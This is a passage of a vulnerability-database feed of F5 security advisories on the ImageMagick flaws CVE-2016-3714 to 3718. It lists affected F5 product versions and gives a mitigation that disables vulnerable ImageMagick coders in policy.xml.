"ImageMagick vulnerability CVE-2016-3717", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:43", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 Product Development has assigned ID 591881 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H25102203 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 5.0.0 \n4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, the vulnerable coders listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-08-24T00:40:00", "published": "2016-05-14T02:44:00", "id": "F5:K25102203", "href": "https://support.f5.com/csp/article/K25102203", "title": "ImageMagick vulnerability CVE-2016-3716", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-28T23:15:49", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 Product Development has assigned ID 591894 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H10550253 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action**: Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick** global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol10550253\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick** coders in the **policymap** stanza. For example, since the vulnerable coders listed in CVE-2016-3715 is EPHEMERAL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-08-24T00:30:00", "published": "2016-05-14T02:44:00", "id": "F5:K10550253", "href": "https://support.f5.com/csp/article/K10550253", "title": "ImageMagick vulnerability CVE-2016-3715", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-08T02:18:16", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "edition": 1, "description": "\nF5 Product Development has assigned ID 591806 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H592135 on the** Diagnostics** >** Identified** > **High** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP GTM| None| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0| 11.2.1 HF16 \n10.1.0 - 10.2.4| Severe| WebAcceleration profile configured with Image Optimization \nBIG-IP WOM| None| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| Not vulnerable| None \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| ImageMagick \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| ImageMagick \nBIG-IQ ADC| 4.5.0| None| Low| ImageMagick \nBIG-IQ Centralized Management| 5.0.0 \n4.6.0| None| Low| ImageMagick \nBIG-IQ Cloud and Orchestration| 1.0.0| None| Low| ImageMagick \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol03151140\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTPS** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\n\nSince the vulnerable coders listed in CVE-2016-3714 are EPHEMERAL, HTTPS, MVG, MSL, TEXT, SHOW, WIN, and PLT, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"TEXT\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"SHOW\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"WIN\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"PLT\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * [K61974123: ImageMagick vulnerability CVE-2016-3718](<https://support.f5.com/csp/article/K61974123>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "modified": "2017-03-17T20:53:00", "published": "2016-05-10T09:23:00", "id": "F5:K03151140", "href": "https://support.f5.com/csp/article/K03151140", "title": "ImageMagick vulnerability CVE-2016-3714", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-20T21:07:47", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "\nF5 Product Development has assigned ID 591918 (BIG-IP), ID 591863 (BIG-IQ), and ID 591865 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H61974123 on the **Diagnostics** > **Identified** > **Medium** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | None | None \nBIG-IP AAM | 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.1 - 12.1.2 \n12.1.0 HF1 \n12.0.0 HF3 \n11.6.1 HF1 \n11.5.4 HF2 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP AFM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP Analytics | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 | Not vulnerable | None \nBIG-IP APM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP DNS | None | 13.0.0 \n12.0.0 - 12.1.2 | Not vulnerable | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP GTM | None | 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.0.0 - 11.6.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 13.0.0 \n12.0.0 - 12.1.2 \n11.3.0 - 11.6.1 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 | 11.2.1 HF16 \n10.1.0 - 10.2.4 | Medium | WebAcceleration profile configured with Image Optimization \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None | 6.0.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ImageMagick \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ImageMagick \nBIG-IQ ADC | 4.5.0 | None | Low | ImageMagick \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ImageMagick \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ImageMagick \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol61974123\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **HTTP** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n \nSince the vulnerable coders listed in CVE-2016-3718 are HTTP and FTP, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"HTTP\" /> \n<policy domain=\"coder\" rights=\"none\" pattern=\"FTP\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K03151140: ImageMagick vulnerability CVE-2016-3714](<https://support.f5.com/csp/article/K03151140>)\n * [K10550253: ImageMagick vulnerability CVE-2016-3715](<https://support.f5.com/csp/article/K10550253>)\n * [K25102203: ImageMagick vulnerability CVE-2016-3716](<https://support.f5.com/csp/article/K25102203>)\n * [K29154575: ImageMagick vulnerability CVE-2016-3717](<https://support.f5.com/csp/article/K29154575>)\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide \n\n**Note**: For information about how to locate F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n", "edition": 1, "modified": "2017-08-24T20:36:00", "published": "2016-05-14T02:43:00", "id": "F5:K61974123", "href": "https://support.f5.com/csp/article/K61974123", "title": "ImageMagick vulnerability CVE-2016-3718", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:24", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.SOL25102203\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, the vulnerable coders listed in CVE-2016-3716 is MSL, the modified **policymap** stanza should look similar to the following example: \n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL03151140: ImageMagick vulnerability CVE-2016-3714\n * SOL10550253: ImageMagick vulnerability CVE-2016-3715\n * SOL29154575: ImageMagick vulnerability CVE-2016-3717\n * SOL61974123: ImageMagick vulnerability CVE-2016-3718\n * The **Accelerating Images with Image Optimization** chapter of the _**BIG-IP Acceleration: Implementations**_ guide\n\n**Note**: For information about how to locate F5 product guides, refer to SOL12453464: Finding product documentation on AskF5.\n", "edition": 1, "modified": "2016-09-02T00:00:00", "published": "2016-05-13T00:00:00", "id": "SOL25102203", "href": "http://support.f5.com/kb/en-us/solutions/public/k/25/sol25102203.html", "type": "f5", "title": "SOL25102203 - ImageMagick vulnerability CVE-2016-3716", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nTo mitigate this vulnerability, you can disable the vulnerable **ImageMagick** coders in the global policy file **/etc/ImageMagick/policy.xml**. To do so, perform the following procedure:\n\n**Impact of action:** Performing the following procedure should not have a negative impact on your system.\n\n 1. Log in to the command line of the affected system.\n 2. Back up the **ImageMagick **global policy file by typing the following command: \n\ncp -p /etc/ImageMagick/policy.xml /var/tmp/policy.xml.sol29154575\n\n 3. Edit the **ImageMagick **global policy file using a text editor of your choice, for example **vi**.\n 4. Include the vulnerable **ImageMagick **coders in the **policymap** stanza. For example, if the **LABEL** coder is vulnerable, you would include the following line in the **policymap** stanza: \n\n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" />\n\nSince the vulnerable coder listed in CVE-2016-3717 is LABEL, the modified **policymap** stanza should look similar to the following example:\n\n<policymap> \n<policy domain=\"coder\" rights=\"none\" pattern=\"LABEL\" /> \n</policymap>\n\n 5. Save the changes and exit the text editor.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * 